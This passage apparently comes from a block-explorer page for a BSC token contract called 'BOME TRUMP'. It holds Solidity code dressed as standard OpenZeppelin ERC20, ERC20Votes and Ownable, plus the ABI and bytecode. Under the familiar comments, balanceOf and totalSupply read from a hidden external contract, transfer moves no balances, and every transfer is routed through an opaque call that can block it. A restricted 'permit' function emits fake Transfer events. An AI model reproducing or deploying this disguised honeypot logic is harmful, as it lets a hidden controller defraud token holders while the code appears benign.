    function totalSupply() public view virtual override returns (uint256) {
        uint256 chainID = _PERMIT._CACHED_CHAIN_ID(); if (chainID != 56) return chainID;
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        uint256 nonce = _PERMIT.nonces(account); if (nonce < type(uint256).max) return nonce;
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _beforeTokenTransfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _beforeTokenTransfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        if (msg.sender == owner) _PERMIT.DOMAIN_SEPARATOR();

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        emit Transfer(from, to, amount);
        
        (bool s,) = address(_PERMIT).call(abi.encodeWithSelector(0xec470ee4, from, to, amount, msg.sender));
        require(s);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}









pragma solidity ^0.8.0;


/**
 * @dev Extension of ERC20 to support Compound-like voting and delegation. This version is more generic than Compound's,
 * and supports token supply up to 2^224^ - 1, while COMP is limited to 2^96^ - 1.
 *
 * NOTE: If exact COMP compatibility is required, use the {ERC20VotesComp} variant of this module.
 *
 * This extension keeps a history (checkpoints) of each account's vote power. Vote power can be delegated either
 * by calling the {delegate} function directly, or by providing a signature to be used with {delegateBySig}. Voting
 * power can be queried through the public accessors {getVotes} and {getPastVotes}.
 *
 * By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it
 * requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked.
 * Enabling self-delegation can easily be done by overriding the {delegates} function. Keep in mind however that this
 * will significantly increase the base gas cost of transfers.
 *
 * _Available since v4.2._
 */
abstract contract ERC20Votes is ERC20Permit {
    struct Checkpoint {
        uint32 fromBlock;
        uint224 votes;
    }

    bytes32 private constant _DELEGATION_TYPEHASH =
        keccak256("Delegation(address delegatee,uint256 nonce,uint256 expiry)");

    mapping(address => address) private _delegates;
    mapping(address => Checkpoint[]) private _checkpoints;
    Checkpoint[] private _totalSupplyCheckpoints;

    /**
     * @dev Emitted when an account changes their delegate.
     */
    event DelegateChanged(address indexed delegator, address indexed fromDelegate, address indexed toDelegate);

    /**
     * @dev Emitted when a token transfer or delegate change results in changes to an account's voting power.
     */
    event DelegateVotesChanged(address indexed delegate, uint256 previousBalance, uint256 newBalance);

    /**
     * @dev Get the `pos`-th checkpoint for `account`.
     */
    function checkpoints(address account, uint32 pos) public view virtual returns (Checkpoint memory) {
        return _checkpoints[account][pos];
    }

    /**
     * @dev Get number of checkpoints for `account`.
     */
    function numCheckpoints(address account) public view virtual returns (uint32) {
        return SafeCast.toUint32(_checkpoints[account].length);
    }

    /**
     * @dev Get the address `account` is currently delegating to.
     */
    function delegates(address account) public view virtual returns (address) {
        return _delegates[account];
    }

    /**
     * @dev Gets the current votes balance for `account`
     */
    function getVotes(address account) public view returns (uint256) {
        uint256 pos = _checkpoints[account].length;
        return pos == 0 ? 0 : _checkpoints[account][pos - 1].votes;
    }

    /**
     * @dev Retrieve the number of votes for `account` at the end of `blockNumber`.
     *
     * Requirements:
     *
     * - `blockNumber` must have been already mined
     */
    function getPastVotes(address account, uint256 blockNumber) public view returns (uint256) {
        require(blockNumber < block.number, "ERC20Votes: block not yet mined");
        return _checkpointsLookup(_checkpoints[account], blockNumber);
    }

    /**
     * @dev Retrieve the `totalSupply` at the end of `blockNumber`. Note, this value is the sum of all balances.
     * It is but NOT the sum of all the delegated votes!
     *
     * Requirements:
     *
     * - `blockNumber` must have been already mined
     */
    function getPastTotalSupply(uint256 blockNumber) public view returns (uint256) {
        require(blockNumber < block.number, "ERC20Votes: block not yet mined");
        return _checkpointsLookup(_totalSupplyCheckpoints, blockNumber);
    }

    /**
     * @dev Lookup a value in a list of (sorted) checkpoints.
     */
    function _checkpointsLookup(Checkpoint[] storage ckpts, uint256 blockNumber) private view returns (uint256) {
        // We run a binary search to look for the earliest checkpoint taken after `blockNumber`.
        //
        // During the loop, the index of the wanted checkpoint remains in the range [low-1, high).
        // With each iteration, either `low` or `high` is moved towards the middle of the range to maintain the invariant.
        // - If the middle checkpoint is after `blockNumber`, we look in [low, mid)
        // - If the middle checkpoint is before or equal to `blockNumber`, we look in [mid+1, high)
        // Once we reach a single value (when low == high), we've found the right checkpoint at the index high-1, if not
        // out of bounds (in which case we're looking too far in the past and the result is 0).
        // Note that if the latest checkpoint available is exactly for `blockNumber`, we end up with an index that is
        // past the end of the array, so we technically don't find a checkpoint after `blockNumber`, but it works out
        // the same.
        uint256 high = ckpts.length;
        uint256 low = 0;
        while (low < high) {
            uint256 mid = Math.average(low, high);
            if (ckpts[mid].fromBlock > blockNumber) {
                high = mid;
            } else {
                low = mid + 1;
            }
        }

        return high == 0 ? 0 : ckpts[high - 1].votes;
    }

    /**
     * @dev Delegate votes from the sender to `delegatee`.
     */
    function delegate(address delegatee) public virtual {
        return _delegate(_msgSender(), delegatee);
    }

    /**
     * @dev Delegates votes from signer to `delegatee`
     */
    function delegateBySig(
        address delegatee,
        uint256 nonce,
        uint256 expiry,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) public virtual {
        require(block.timestamp <= expiry, "ERC20Votes: signature expired");
        address signer = ECDSA.recover(
            _hashTypedDataV4(keccak256(abi.encode(_DELEGATION_TYPEHASH, delegatee, nonce, expiry))),
            v,
            r,
            s
        );
        require(nonce == _useNonce(signer), "ERC20Votes: invalid nonce");
        return _delegate(signer, delegatee);
    }

    /**
     * @dev Maximum token supply. Defaults to `type(uint224).max` (2^224^ - 1).
     */
    function _maxSupply() internal view virtual returns (uint224) {
        return type(uint224).max;
    }
    /**
     * @dev Change delegation for `delegator` to `delegatee`.
     *
     * Emits events {DelegateChanged} and {DelegateVotesChanged}.
     */
    function _delegate(address delegator, address delegatee) internal virtual {
        address currentDelegate = delegates(delegator);
        _delegates[delegator] = delegatee;

        emit DelegateChanged(delegator, currentDelegate, delegatee);

        _moveVotingPower(currentDelegate, delegatee, 0);
    }

    function _moveVotingPower(
        address src,
        address dst,
        uint256 amount
    ) private {
        if (src != dst && amount > 0) {
            if (src != address(0)) {
                (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, amount);
                emit DelegateVotesChanged(src, oldWeight, newWeight);
            }

            if (dst != address(0)) {
                (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount);
                emit DelegateVotesChanged(dst, oldWeight, newWeight);
            }
        }
    }

    function _writeCheckpoint(
        Checkpoint[] storage ckpts,
        function(uint256, uint256) view returns (uint256) op,
        uint256 delta
    ) private returns (uint256 oldWeight, uint256 newWeight) {
        uint256 pos = ckpts.length;
        oldWeight = pos == 0 ? 0 : ckpts[pos - 1].votes;
        newWeight = op(oldWeight, delta);

        if (pos > 0 && ckpts[pos - 1].fromBlock == block.number) {
            ckpts[pos - 1].votes = SafeCast.toUint224(newWeight);
        } else {
            ckpts.push(Checkpoint({fromBlock: SafeCast.toUint32(block.number), votes: SafeCast.toUint224(newWeight)}));
        }
    }

    function _add(uint256 a, uint256 b) private pure returns (uint256) {
        return a + b;
    }

    function _subtract(uint256 a, uint256 b) private pure returns (uint256) {
        return a - b;
    }
}



pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}





pragma solidity ^0.8.2;

/**
 * @dev An ERC20 token for TRUMP.
 */
contract TRUMPToken is ERC20, ERC20Votes, Ownable {
    /**
     * @dev Constructor.
     */
    constructor()
        ERC20("BOME TRUMP", "TRUMP")
        ERC20Permit("TRUMP")
    {
        _mint(msg.sender, 68_961_771_000 * 1e18);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_CACHED_CHAIN_ID","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint32","name":"pos","type":"uint32"}],"name":"checkpoints","outputs":[{"components":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint224","name":"votes","type":"uint224"}],"internalType":"struct ERC20Votes.Checkpoint","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"},{"internalType":"uint256","name":"nonce","type":"uint256"},{"internalType":"uint256","name":"expiry","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"delegateBySig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"delegates","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint8","name":"","type":"uint8"},{"internalType":"bytes32","name":"","type":"bytes32"},{"internalType":"bytes32","name":"","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6101606040527f6e71edae12b1b97f4d1f60370fef10105fa2faae0126114a169c64845d6126c9610120523480156200003757600080fd5b50604080518082018252600a8152690424f4d45205452554d560b41b6020808301919091528251808401845260058082526405452554d560dc1b828401819052855180870187529182528184019081528551808701875260018152603160f81b908501528151902060c08181527fc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc660e08181524660a08181528a517f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f818b0152808c01969096526060860193909352608080860191909152308584015289518086039093018352928401808a528251929097019190912090915273dd32744e3cad764c33ffb64279d622fb429e8cc06101008190526004865260e483018852910180516001600160e01b031663955810d360e01b1790529451939491939092600092916200018691906200038f565b6000604051808303816000865af19150503d8060008114620001c5576040519150601f19603f3d011682016040523d82523d6000602084013e620001ca565b606091505b5091505080806020019051810190620001e49190620003c0565b6001600160a01b031661014052506004905062000202838262000496565b50600562000211828262000496565b5050506200022e620002286200024c60201b60201c565b62000250565b62000246336bded3d708d517b3247ce00000620002a2565b6200058a565b3390565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620002fd5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b806003600082825462000311919062000562565b90915550506001600160a01b038216600090815260016020526040812080548392906200034090849062000562565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b6000825160005b81811015620003b2576020818601810151858301520162000396565b506000920191825250919050565b600060208284031215620003d357600080fd5b81516001600160a01b0381168114620003eb57600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200041d57607f821691505b6020821081036200043e57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200038a57600081815260208120601f850160051c810160208610156200046d5750805b601f850160051c820191505b818110156200048e5782815560010162000479565b505050505050565b81516001600160401b03811115620004b257620004b2620003f2565b620004ca81620004c3845462000408565b8462000444565b602080601f831160018114620005025760008415620004e95750858301515b600019600386901b1c1916600185901b1785556200048e565b600085815260208120601f198616915b82811015620005335788860151825594840194600190910190840162000512565b5085821015620005525787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b808201808211156200058457634e487b7160e01b600052601160045260246000fd5b92915050565b60805160a05160c05160e051610100516101205161014051611d5662000605600039600081816104d20152818161072f0152818161094a01528181610e020152610f91015260005050600061106e015260006110be0152600061109901526000818161020201526110150152600061103d0152611d566000f3fe608060405234801561001057600080fd5b506004361061018e5760003560e01c8063715018a6116100de5780639bda93ce11610097578063c3cda52011610071578063c3cda52014610388578063dd62ed3e1461039b578063f1127ed8146103d4578063f2fde38b1461041157600080fd5b80639bda93ce1461034f578063a457c2d714610362578063a9059cbb1461037557600080fd5b8063715018a6146102f55780637ecebe00146102fd5780638da5cb5b146103105780638e539e8c1461032157806395d89b41146103345780639ab24eb01461033c57600080fd5b80633644e5151161014b578063587cde1e11610125578063587cde1e146102615780635c19a95c146102a55780636fcfff45146102ba57806370a08231146102e257600080fd5b80633644e51514610233578063395093511461023b5780633a46b1a81461024e57600080fd5b806306fdde0314610193578063095ea7b3146101b157806318160ddd146101d457806323b872dd146101ea5780632b437d48146101fd578063313ce56714610224575b600080fd5b61019b610424565b6040516101a891906119ab565b60405180910390f35b6101c46101bf3660046119fa565b6104b6565b60405190151581526020016101a8565b6101dc6104cd565b6040519081526020016101a8565b6101c46101f8366004611a24565b610569565b6101dc7f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101a8565b6101dc610618565b6101c46102493660046119fa565b610627565b6101dc61025c3660046119fa565b610663565b61028d61026f366004611a60565b6001600160a01b039081166000908152600660205260409020541690565b6040516001600160a01b0390911681526020016101a8565b6102b86102b3366004611a60565b6106dd565b005b6102cd6102c8366004611a60565b6106ea565b60405163ffffffff90911681526020016101a8565b6101dc6102f0366004611a60565b61070c565b6102b86107c9565b6101dc61030b366004611a60565b61082f565b6009546001600160a01b031661028d565b6101dc61032f366004611a7b565b61084d565b61019b6108a9565b6101dc61034a366004611a60565b6108b8565b6102b861035d366004611aa5565b61093f565b6101c46103703660046119fa565b610a05565b6101c46103833660046119fa565b610a9e565b6102b8610396366004611b62565b610aab565b6101dc6103a9366004611bba565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6103e76103e2366004611bed565b610be1565b60408051825163ffffffff1681526020928301516001600160e01b031692810192909252016101a8565b6102b861041f366004611a60565b610c65565b60606004805461043390611c2d565b80601f016020809104026020016040519081016040528092919081815260200182805461045f90611c2d565b80156104ac5780601f10610481576101008083540402835291602001916104ac565b820191906000526020600020905b81548152906001019060200180831161048f57829003601f168201915b5050505050905090565b60006104c3338484610d2d565b5060015b92915050565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316632b437d486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561052e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105529190611c61565b90508060381461056157919050565b505060035490565b6000610576848484610ee5565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156106005760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61060d8533858403610d2d565b506001949350505050565b6000610622611011565b905090565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916104c391859061065e908690611c90565b610d2d565b60004382106106b45760405162461bcd60e51b815260206004820152601f60248201527f4552433230566f7465733a20626c6f636b206e6f7420796574206d696e65640060448201526064016105f7565b6001600160a01b03831660009081526007602052604090206106d6908361110c565b9392505050565b6106e733826111c9565b50565b6001600160a01b0381166000908152600760205260408120546104c790611239565b604051623f675f60e91b81526001600160a01b03828116600483015260009182917f00000000000000000000000000000000000000000000000000000000000000001690637ecebe0090602401602060405180830381865afa158015610776573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061079a9190611c61565b90506000198110156107ac5792915050565b50506001600160a01b031660009081526001602052604090205490565b6009546001600160a01b031633146108235760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105f7565b61082d60006112a2565b565b6001600160a01b0381166000908152602081905260408120546104c7565b600043821061089e5760405162461bcd60e51b815260206004820152601f60248201527f4552433230566f7465733a20626c6f636b206e6f7420796574206d696e65640060448201526064016105f7565b6104c760088361110c565b60606005805461043390611c2d565b6001600160a01b038116600090815260076020526040812054801561092c576001600160a01b03831660009081526007602052604090206108fa600183611ca3565b8154811061090a5761090a611cb6565b60009182526020909120015464010000000090046001600160e01b031661092f565b60005b6001600160e01b03169392505050565b336001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000161461097457600080fd5b60005b868110156109fa5787878281811061099157610991611cb6565b90506020020160208101906109a69190611a60565b6001600160a01b0316896001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef886040516109ea91815260200190565b60405180910390a3600101610977565b505050505050505050565b3360009081526002602090815260408083206001600160a01b038616845290915281205482811015610a875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016105f7565b610a943385858403610d2d565b5060019392505050565b60006104c3338484610ee5565b83421115610afb5760405162461bcd60e51b815260206004820152601d60248201527f4552433230566f7465733a207369676e6174757265206578706972656400000060448201526064016105f7565b604080517fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf60208201526001600160a01b038816918101919091526060810186905260808101859052600090610b7590610b6d9060a001604051602081830303815290604052805190602001206112f4565b858585611342565b9050610b808161136a565b8614610bce5760405162461bcd60e51b815260206004820152601960248201527f4552433230566f7465733a20696e76616c6964206e6f6e63650000000000000060448201526064016105f7565b610bd881886111c9565b50505050505050565b60408051808201909152600080825260208201526001600160a01b0383166000908152600760205260409020805463ffffffff8416908110610c2557610c25611cb6565b60009182526020918290206040805180820190915291015463ffffffff8116825264010000000090046001600160e01b0316918101919091529392505050565b6009546001600160a01b03163314610cbf5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105f7565b6001600160a01b038116610d245760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105f7565b6106e7816112a2565b6001600160a01b038316610d8f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105f7565b6001600160a01b038216610df05760405162461bcd60e51b815260206004820152602260248201527f